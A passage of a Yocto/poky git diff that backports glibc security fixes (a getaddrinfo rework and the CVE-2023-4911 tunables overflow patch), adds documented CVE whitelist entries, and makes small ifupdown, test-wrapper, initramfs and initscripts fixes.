++192.0.1.190	example.org
++192.0.1.191	example.org
++192.0.1.192	example.org
++192.0.1.193	example.org
++192.0.1.194	example.org
++192.0.1.195	example.org
++192.0.1.196	example.org
++192.0.1.197	example.org
++192.0.1.198	example.org
++192.0.1.199	example.org
++192.0.1.200	example.org
++192.0.1.201	example.org
++192.0.1.202	example.org
++192.0.1.203	example.org
++192.0.1.204	example.org
++192.0.1.205	example.org
++192.0.1.206	example.org
++192.0.1.207	example.org
++192.0.1.208	example.org
++192.0.1.209	example.org
++192.0.1.210	example.org
++192.0.1.211	example.org
++192.0.1.212	example.org
++192.0.1.213	example.org
++192.0.1.214	example.org
++192.0.1.215	example.org
++192.0.1.216	example.org
++192.0.1.217	example.org
++192.0.1.218	example.org
++192.0.1.219	example.org
++192.0.1.220	example.org
++192.0.1.221	example.org
++192.0.1.222	example.org
++192.0.1.223	example.org
++192.0.1.224	example.org
++192.0.1.225	example.org
++192.0.1.226	example.org
++192.0.1.227	example.org
++192.0.1.228	example.org
++192.0.1.229	example.org
++192.0.1.230	example.org
++192.0.1.231	example.org
++192.0.1.232	example.org
++192.0.1.233	example.org
++192.0.1.234	example.org
++192.0.1.235	example.org
++192.0.1.236	example.org
++192.0.1.237	example.org
++192.0.1.238	example.org
++192.0.1.239	example.org
++192.0.1.240	example.org
++192.0.1.241	example.org
++192.0.1.242	example.org
++192.0.1.243	example.org
++192.0.1.244	example.org
++192.0.1.245	example.org
++192.0.1.246	example.org
++192.0.1.247	example.org
++192.0.1.248	example.org
++192.0.1.249	example.org
++192.0.1.250	example.org
++192.0.1.251	example.org
++192.0.1.252	example.org
++192.0.1.253	example.org
++192.0.1.254	example.org
+diff --git a/sysdeps/posix/getaddrinfo.c b/sysdeps/posix/getaddrinfo.c
+index 18dccd5924..3d9bea60c6 100644
+--- a/sysdeps/posix/getaddrinfo.c
++++ b/sysdeps/posix/getaddrinfo.c
+@@ -458,11 +458,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 
+   if (name != NULL)
+     {
+-      at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
+-      at->family = AF_UNSPEC;
+-      at->scopeid = 0;
+-      at->next = NULL;
+-
+       if (req->ai_flags & AI_IDN)
+ 	{
+ 	  char *out;
+@@ -473,13 +468,21 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 	  malloc_name = true;
+ 	}
+ 
+-      if (__inet_aton_exact (name, (struct in_addr *) at->addr) != 0)
++      uint32_t addr[4];
++      if (__inet_aton_exact (name, (struct in_addr *) addr) != 0)
+ 	{
++	  at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
++	  at->scopeid = 0;
++	  at->next = NULL;
++
+ 	  if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
+-	    at->family = AF_INET;
++	    {
++	      memcpy (at->addr, addr, sizeof (at->addr));
++	      at->family = AF_INET;
++	    }
+ 	  else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
+ 	    {
+-	      at->addr[3] = at->addr[0];
++	      at->addr[3] = addr[0];
+ 	      at->addr[2] = htonl (0xffff);
+ 	      at->addr[1] = 0;
+ 	      at->addr[0] = 0;
+@@ -505,49 +505,62 @@
+ 
+ 	  if (req->ai_flags & AI_CANONNAME)
+ 	    canon = name;
++
++	  goto process_list;
+ 	}
+-      else if (at->family == AF_UNSPEC)
++
++      char *scope_delim = strchr (name, SCOPE_DELIMITER);
++      int e;
++
++      if (scope_delim == NULL)
++	e = inet_pton (AF_INET6, name, addr);
++      else
++	e = __inet_pton_length (AF_INET6, name, scope_delim - name, addr);
++
++      if (e > 0)
+ 	{
+-	  char *scope_delim = strchr (name, SCOPE_DELIMITER);
+-	  int e;
+-	  if (scope_delim == NULL)
+-	    e = inet_pton (AF_INET6, name, at->addr);
++	  at = alloca_account (sizeof (struct gaih_addrtuple),
++			       alloca_used);
++	  at->scopeid = 0;
++	  at->next = NULL;
++
++	  if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
++	    {
++	      memcpy (at->addr, addr, sizeof (at->addr));
++	      at->family = AF_INET6;
++	    }
++	  else if (req->ai_family == AF_INET
++		   && IN6_IS_ADDR_V4MAPPED (addr))
++	    {
++	      at->addr[0] = addr[3];
++	      at->addr[1] = addr[1];
++	      at->addr[2] = addr[2];
++	      at->addr[3] = addr[3];
++	      at->family = AF_INET;
++	    }
+ 	  else
+-	    e = __inet_pton_length (AF_INET6, name, scope_delim - name,
+-				    at->addr);
+-	  if (e > 0)
+ 	    {
+-	      if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
+-		at->family = AF_INET6;
+-	      else if (req->ai_family == AF_INET
+-		       && IN6_IS_ADDR_V4MAPPED (at->addr))
+-		{
+-		  at->addr[0] = at->addr[3];
+-		  at->family = AF_INET;
+-		}
+-	      else
+-		{
+-		  result = -EAI_ADDRFAMILY;
+-		  goto free_and_return;
+-		}
+-
+-	      if (scope_delim != NULL
+-		  && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
+-					   scope_delim + 1,
+-					   &at->scopeid) != 0)
+-		{
+-		  result = -EAI_NONAME;
+-		  goto free_and_return;
+-		}
++	      result = -EAI_ADDRFAMILY;
++	      goto free_and_return;
++	    }
+ 
+-	      if (req->ai_flags & AI_CANONNAME)
+-		canon = name;
++	  if (scope_delim != NULL
++	      && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
++				       scope_delim + 1,
++				       &at->scopeid) != 0)
++	    {
++	      result = -EAI_NONAME;
++	      goto free_and_return;
+ 	    }
++
++	  if (req->ai_flags & AI_CANONNAME)
++	    canon = name;
++
++	  goto process_list;
+ 	}
+ 
+-      if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
++      if ((req->ai_flags & AI_NUMERICHOST) == 0)
+ 	{
+-	  struct gaih_addrtuple **pat = &at;
+ 	  int no_data = 0;
+ 	  int no_inet6_data = 0;
+ 	  service_user *nip;
+@@ -543,6 +559,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 	  enum nss_status status = NSS_STATUS_UNAVAIL;
+ 	  int no_more;
+ 	  struct resolv_context *res_ctx = NULL;
++	  bool do_merge = false;
+ 
+ 	  /* If we do not have to look for IPv6 addresses or the canonical
+ 	     name, use the simple, old functions, which do not support
+@@ -579,7 +596,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 			  result = -EAI_MEMORY;
+ 			  goto free_and_return;
+ 			}
+-		      *pat = addrmem;
++		      at = addrmem;
+ 		    }
+ 		  else
+ 		    {
+@@ -632,6 +649,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 		    }
+ 
+ 		  struct gaih_addrtuple *addrfree = addrmem;
++		  struct gaih_addrtuple **pat = &at;
++
+ 		  for (int i = 0; i < air->naddrs; ++i)
+ 		    {
+ 		      socklen_t size = (air->family[i] == AF_INET
+@@ -695,12 +714,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 
+ 		  free (air);
+ 
+-		  if (at->family == AF_UNSPEC)
+-		    {
+-		      result = -EAI_NONAME;
+-		      goto free_and_return;
+-		    }
+-
+ 		  goto process_list;
+ 		}
+ 	      else if (err == 0)
+@@ -750,6 +763,22 @@
+ 
+ 	  while (!no_more)
+ 	    {
++	      /* Always start afresh; continue should discard previous results
++		 and the hosts database does not support merge.  */
++	      at = NULL;
++	      free (canonbuf);
++	      free (addrmem);
++	      canon = canonbuf = NULL;
++	      addrmem = NULL;
++	      got_ipv6 = false;
++
++	      if (do_merge)
++		{
++		  __set_h_errno (NETDB_INTERNAL);
++		  __set_errno (EBUSY);
++		  break;
++		}
++
+ 	      no_data = 0;
+ 	      nss_gethostbyname4_r fct4 = NULL;
+ 
+@@ -744,12 +773,14 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 		{
+ 		  while (1)
+ 		    {
+-		      status = DL_CALL_FCT (fct4, (name, pat,
++		      status = DL_CALL_FCT (fct4, (name, &at,
+ 						   tmpbuf->data, tmpbuf->length,
+ 						   &errno, &h_errno,
+ 						   NULL));
+ 		      if (status == NSS_STATUS_SUCCESS)
+ 			break;
++		      /* gethostbyname4_r may write into AT, so reset it.  */
++		      at = NULL;
+ 		      if (status != NSS_STATUS_TRYAGAIN
+ 			  || errno != ERANGE || h_errno != NETDB_INTERNAL)
+ 			{
+@@ -774,7 +805,9 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 		      no_data = 1;
+ 
+ 		      if ((req->ai_flags & AI_CANONNAME) != 0 && canon == NULL)
+-			canon = (*pat)->name;
++			canon = at->name;
++
++		      struct gaih_addrtuple **pat = &at;
+ 
+ 		      while (*pat != NULL)
+ 			{
+@@ -826,6 +859,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 
+ 		  if (fct != NULL)
+ 		    {
++		      struct gaih_addrtuple **pat = &at;
++
+ 		      if (req->ai_family == AF_INET6
+ 			  || req->ai_family == AF_UNSPEC)
+ 			{
+@@ -917,6 +946,10 @@
+ 	      if (nss_next_action (nip, status) == NSS_ACTION_RETURN)
+ 		break;
+ 
++	      /* The hosts database does not support MERGE.  */
++	      if (nss_next_action (nip, status) == NSS_ACTION_MERGE)
++		do_merge = true;
++
+ 	      if (nip->next == NULL)
+ 		no_more = -1;
+ 	      else
+@@ -930,7 +969,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ 	}
+ 
+     process_list:
+-      if (at->family == AF_UNSPEC)
++      if (at == NULL)
+ 	{
+ 	  result = -EAI_NONAME;
+ 	  goto free_and_return;
+-- 
+2.39.3
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
new file mode 100644
index 0000000000..4d3146509a
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
@@ -0,0 +1,63 @@
+From d2b77337f734fcacdfc8e0ddec14cf31a746c7be Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@redhat.com>
+Date: Mon, 11 Sep 2023 18:53:15 -0400
+Subject: [PATCH v2] tunables: Terminate immediately if end of input is reached
+
+The string parsing routine may end up writing beyond bounds of tunestr
+if the input tunable string is malformed, of the form name=name=val.
+This gets processed twice, first as name=name=val and next as name=val,
+resulting in tunestr being name=name=val:name=val, thus overflowing
+tunestr.
+
+Terminate the parsing loop at the first instance itself so that tunestr
+does not overflow.
+---
+Changes from v1:
+
+- Also null-terminate tunestr before exiting.
+
+ elf/dl-tunables.c | 17 ++++++++++-------
+ 1 file changed, 10 insertions(+), 7 deletions(-)
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2023-4911
+
+diff --git a/elf/dl-tunables.c b/elf/dl-tunables.c
+index 8e7ee9df10..76cf8b9da3 100644
+--- a/elf/dl-tunables.c
++++ b/elf/dl-tunables.c
+@@ -187,11 +187,7 @@ parse_tunables (char *tunestr, char *valstring)
+       /* If we reach the end of the string before getting a valid name-value
+ 	 pair, bail out.  */
+       if (p[len] == '\0')
+-	{
+-	  if (__libc_enable_secure)
+-	    tunestr[off] = '\0';
+-	  return;
+-	}
++	break;
+ 
+       /* We did not find a valid name-value pair before encountering the
+ 	 colon.  */
+@@ -251,9 +247,16 @@ parse_tunables (char *tunestr, char *valstring)
+ 	    }
+ 	}
+ 
+-      if (p[len] != '\0')
+-	p += len + 1;
++      /* We reached the end while processing the tunable string.  */
++      if (p[len] == '\0')
++	break;
++
++      p += len + 1;
+     }
++
++  /* Terminate tunestr before we leave.  */
++  if (__libc_enable_secure)
++    tunestr[off] = '\0';
+ }
+ #endif
+ 
+-- 
+2.41.0
+
diff --git a/meta/recipes-core/glibc/glibc/check-test-wrapper b/meta/recipes-core/glibc/glibc/check-test-wrapper
index f8e04e02d2..5cc993f718 100644
--- a/meta/recipes-core/glibc/glibc/check-test-wrapper
+++ b/meta/recipes-core/glibc/glibc/check-test-wrapper
@@ -2,6 +2,7 @@
 import sys
 import os
 import subprocess
+import resource
 
 env = os.environ.copy()
 args = sys.argv[1:]
@@ -44,12 +45,20 @@ if targettype == "user":
     qemuargs += ["-L", sysroot]
     qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))]
     command = qemuargs + args
+
+    # We've seen qemu-arm using up all system memory for some glibc
+    # tests e.g. nptl/tst-pthread-timedlock-lockloop
+    # Cap at 8GB since no test should need more than that
+    # (5GB adds 7 failures for qemuarm glibc test run)
+    limit = 8*1024*1024*1024
+    resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
+
 elif targettype == "ssh":
     host = os.environ.get("SSH_HOST", None)
     user = os.environ.get("SSH_HOST_USER", None)
     port = os.environ.get("SSH_HOST_PORT", None)
 
-    command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no"]
+    command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no", "-o", "LogLevel=quiet"]
     if port:
         command += ["-p", str(port)]
     if not host:
diff --git a/meta/recipes-core/glibc/glibc_2.31.bb b/meta/recipes-core/glibc/glibc_2.31.bb
index 3d486fbb59..296c892994 100644
--- a/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/meta/recipes-core/glibc/glibc_2.31.bb
@@ -1,7 +1,40 @@
 require glibc.inc
 require glibc-version.inc
 
-CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752"
+CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752 \
+                        CVE-2021-27645 CVE-2021-3326 CVE-2020-27618 CVE-2020-29562 CVE-2019-25013 \
+                        CVE-2022-23218 CVE-2022-23219 \
+"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010022
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010023
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010024
+# Upstream glibc maintainers dispute there is any issue and have no plans to address it further.
+# "this is being treated as a non-security bug and no real threat."
+CVE_CHECK_WHITELIST += "CVE-2019-1010022 CVE-2019-1010023 CVE-2019-1010024"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010025
+# Allows for ASLR bypass so can bypass some hardening, not an exploit in itself, may allow
+# easier access for another. "ASLR bypass itself is not a vulnerability."
+# Potential patch at https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+CVE_CHECK_WHITELIST += "CVE-2019-1010025"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35942
+# The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash
+# or read arbitrary memory in parse_param (in posix/wordexp.c) when called with
+# an untrusted, crafted pattern, potentially resulting in a denial of service
+# or disclosure of information. Patch was backported to 2.31 branch already:
+# https://sourceware.org/git/?p=glibc.git;a=commit;h=4f0a61f75385c9a5879cbe7202042e88f692a3c8
+# which is already included in the dunfell branch of poky:
+# https://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?h=dunfell&id=e1e89ff7d75c3d2223f9e3bd875b9b0c5e15836b
+CVE_CHECK_WHITELIST += "CVE-2021-35942"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-4527
+# This vulnerability was introduced in 2.36 by commit
+# f282cdbe7f436c75864e5640a409a10485e9abb2 resolv: Implement no-aaaa stub resolver option
+# so our version is not yet vulnerable
+# See https://sourceware.org/bugzilla/show_bug.cgi?id=30842
+CVE_CHECK_WHITELIST += "CVE-2023-4527"
 
 DEPENDS += "gperf-native bison-native make-native"
 
@@ -41,6 +74,21 @@ SRC_URI =  "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
            file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \
            file://0028-inject-file-assembly-directives.patch \
            file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \
+           file://CVE-2020-29573.patch \
+           file://CVE-2021-33574_1.patch \
+           file://CVE-2021-33574_2.patch \
+           file://CVE-2021-38604.patch \
+           file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \
+           file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \
+           file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \
+           file://0033-elf-Add-test-case-for-BZ-19329.patch \
+           file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \
+           file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+           file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+           file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \
+           file://CVE-2023-0687.patch \
+           file://CVE-2023-4911.patch \
+           file://CVE-2023-4813.patch \
            "
 S = "${WORKDIR}/git"
 B = "${WORKDIR}/build-${TARGET_SYS}"
diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c7..d1835c7a10 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
    return 0;
  }
  
-+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org"
++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
  /* Print bug-reporting information in the help message.  */
  static char *
  more_help (int key, const char *text, void *input)
diff --git a/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
new file mode 100644
index 0000000000..e374d8ca59
--- /dev/null
+++ b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
@@ -0,0 +1,65 @@
+From e2263b58d7733835355d7b46c3caa96d911a4717 Mon Sep 17 00:00:00 2001
+From: Simon Schwarz <simon.schwarz@infoteam.de>
+Date: Fri, 6 Nov 2020 08:53:20 +0100
+Subject: [PATCH] inet6.defn: Added -1 option to dhclient on upping an
+ interface
+
+This prevents hangs on startup when no server is available and dhcpv6 is used
+
+Upstream-Status: Pending
+
+Signed-off-by: Simon Schwarz <simon.schwarz@infoteam.de>
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ inet6.defn | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/inet6.defn b/inet6.defn
+index 73dce24..25022e3 100644
+--- a/inet6.defn
++++ b/inet6.defn
+@@ -29,9 +29,9 @@ method auto
+         if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+     /sbin/ip link set dev %iface% up
+     /lib/ifupdown/wait-for-ll6.sh if (var_true("dhcp", ifd) && execable("/lib/ifupdown/wait-for-ll6.sh"))
+-    /sbin/dhclient -6 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++    /sbin/dhclient -6 -1 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+         if (var_true("dhcp", ifd) && execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+-    /sbin/dhclient -6 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++    /sbin/dhclient -6 -1 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+         elsif (var_true("dhcp", ifd) && execable("/sbin/dhclient"))
+     echo 'No DHCPv6 client software found!' >&2; false \
+         elsif (var_true("dhcp", ifd))
+@@ -154,9 +154,9 @@ method dhcp
+         if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+     /sbin/ip link set dev %iface% [[address %hwaddress%]] up
+     /lib/ifupdown/wait-for-ll6.sh if (execable("/lib/ifupdown/wait-for-ll6.sh"))
+-    /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++    /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+         if (execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+-    /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++    /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+         elsif (execable("/sbin/dhclient"))
+     echo 'No DHCPv6 client software found!' >&2; false \
+         elsif (1)
+@@ -325,7 +325,7 @@ method dhcp
+ 
+   up
+     /sbin/ifconfig %iface% [[link %hwaddress%]] up
+-    /sbin/dhclient -6 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++    /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+         if (execable("/sbin/dhclient"))
+     echo 'No DHCPv6 client software found!' >&2; false \
+         elsif (1)
+@@ -397,7 +397,7 @@ method dhcp
+   up
+     [[Warning: Option hwaddress: %hwaddress% not yet supported]]
+     inetutils-ifconfig --interface %iface% --up
+-    /sbin/dhclient -6 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
++    /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
+         if (execable("/sbin/dhclient"))
+     echo 'No DHCPv6 client software found!' >&2; false \
+         elsif (1)
+-- 
+2.17.1
+
diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
index 53cb971d33..c3681defdc 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
@@ -1,4 +1,5 @@
 SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts"
+HOMEPAGE = "https://salsa.debian.org/debian/ifupdown"
 DESCRIPTION = "High level tools to configure network interfaces \
 This package provides the tools ifup and ifdown which may be used to \
 configure (or, respectively, deconfigure) network interfaces, based on \
@@ -6,11 +7,12 @@ the file /etc/network/interfaces."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
 
-SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
            file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
            file://99_network \
            file://0001-Define-FNM_EXTMATCH-for-musl.patch \
            file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \
+           file://0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch \
            file://run-ptest \
            ${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \
            "
diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index 4f935be730..035312f4d9 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -22,9 +22,9 @@ APPEND += "rootfstype=ext4 quiet"
 DEPENDS = "zip-native python3-pip-native"
 IMAGE_FSTYPES = "wic.vmdk"
 
-inherit core-image module-base setuptools3
+inherit core-image setuptools3
 
-SRCREV ?= "5ad59495782e8dbcb2b9d18e27ca4bde131465b4"
+SRCREV ?= "77442211926cbe93d60108f6df4abda3bc06b735"
 SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \
            file://Yocto_Build_Appliance.vmx \
            file://Yocto_Build_Appliance.vmxf \
@@ -61,12 +61,6 @@ fakeroot do_populate_poky_src () {
 	# Place the README_VirtualBox_Toaster file in builders home folder.
 	cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/
 
-	# Create a symlink, needed for out-of-tree kernel modules build
-	if [ ! -e ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build ]; then
-		rm -f  ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
-		lnr ${IMAGE_ROOTFS}${KERNEL_SRC_PATH} ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
-	fi
-
 	echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf
 	echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc
 
diff --git a/meta/recipes-core/initrdscripts/files/init-install-efi.sh b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
index b6855b5aac..f667518b89 100644
--- a/meta/recipes-core/initrdscripts/files/init-install-efi.sh
+++ b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
@@ -279,6 +279,11 @@ fi
 
 umount /tgt_root
 
+# copy any extra files needed for ESP
+if [ -d /run/media/$1/esp ]; then
+    cp -r /run/media/$1/esp/* /boot
+fi
+
 # Copy kernel artifacts. To add more artifacts just add to types
 # For now just support kernel types already being used by something in OE-core
 for types in bzImage zImage vmlinux vmlinuz fitImage; do
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/finish b/meta/recipes-core/initrdscripts/initramfs-framework/finish
index 717383ebac..dee3ab3387 100755
--- a/meta/recipes-core/initrdscripts/initramfs-framework/finish
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/finish
@@ -14,6 +14,15 @@ finish_run() {
 
 		info "Switching root to '$ROOTFS_DIR'..."
 
+		debug "Moving basic mounts onto rootfs"
+		for dir in `awk '/\/dev.* \/run\/media/{print $2}' /proc/mounts`; do
+			# Parse any OCT or HEX encoded chars such as spaces
+			# in the mount points to actual ASCII chars
+			dir=`printf $dir`
+			mkdir -p "${ROOTFS_DIR}/media/${dir##*/}"
+			mount -n --move "$dir" "${ROOTFS_DIR}/media/${dir##*/}"
+		done
+
 		debug "Moving /dev, /proc and /sys onto rootfs..."
 		mount --move /dev $ROOTFS_DIR/dev
 		mount --move /proc $ROOTFS_DIR/proc
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
index 748c9391c0..1d8a0ae66d 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
@@ -67,8 +67,8 @@ rootfs_run() {
 					# It is unlikely to change, but keep trying anyway.
 					# Perhaps we pick a different device next time.
 					umount $ROOTFS_DIR
-					fi
 				fi
+			fi
 		fi
 		debug "Sleeping for $delay second(s) to wait root to settle..."
 		sleep $delay
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f41285..7e92f93322 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
 # Copyright (C) 2011 O.S. Systems Software LTDA.
 # Licensed on MIT
 
diff --git a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
index 02f0351fcb..a63e71b780 100755
--- a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
+++ b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
@@ -74,7 +74,7 @@ test "$VERBOSE" != no && echo "Activating swap"
 #
 # Check the root filesystem.
 #
-if test -f /fastboot || test $rootcheck = no
+if test -f /fastboot || test "$rootcheck" = "no"
 then
   test $rootcheck = yes && echo "Fast boot, no filesystem check"
 else
diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index f98e42eb2e..cb5417cc39 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -129,7 +129,7 @@ do_install () {
 	update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 .
 	update-rc.d -r ${D} sendsigs start 20 0 6 .
 	update-rc.d -r ${D} urandom start 38 S 0 6 .
-	update-rc.d -r ${D} umountnfs.sh start 31 0 1 6 .
+	update-rc.d -r ${D} umountnfs.sh stop 31 0 1 6 .
 	update-rc.d -r ${D} umountfs start 40 0 6 .
 	update-rc.d -r ${D} reboot start 90 6 .
